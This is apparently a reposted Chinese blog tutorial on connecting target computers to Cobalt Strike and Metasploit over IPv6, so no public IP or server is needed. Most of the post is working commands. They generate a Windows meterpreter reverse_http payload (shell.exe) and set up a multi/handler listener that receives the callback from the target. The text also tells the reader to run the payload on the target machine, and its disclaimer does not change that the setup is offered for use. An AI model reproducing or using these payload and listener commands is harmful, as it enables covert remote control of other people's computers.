在前面的实验中。我们利用cs和msf进行设备上线。但均是在内网环境下上线的。对于外网设备我们通常利用端口映射的方式上线。但这也要求我们需要一台服务器。那么有没有更加实惠的方法呢?
没错!那就是利用ipv6上线。故而需要你的网络支持ipv6(目前基本普及)
注意: 本文仅供学习,坚决反对一切危害网络安全的行为。造成法律责任自行负责。
确定IP
登录kali后,我们利用ifconfig
命令查看本机的ipv6地址。注意,240e
(电信)开头的就是。
CS 上线
首先,我们在cs中新建一个ipv6的监听。
配置完成后,我们生成payload
在目标电脑运行paylaod 成功上线。
因为利用的运营商网络,延时还是不错的。
msf上线
首先,我们需要根据下面命令生成含有ipv6地址的shell。
msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe
配置msf
use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit
原文始发于微信公众号(kali笔记):无需公网IP 上线CS与MSF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论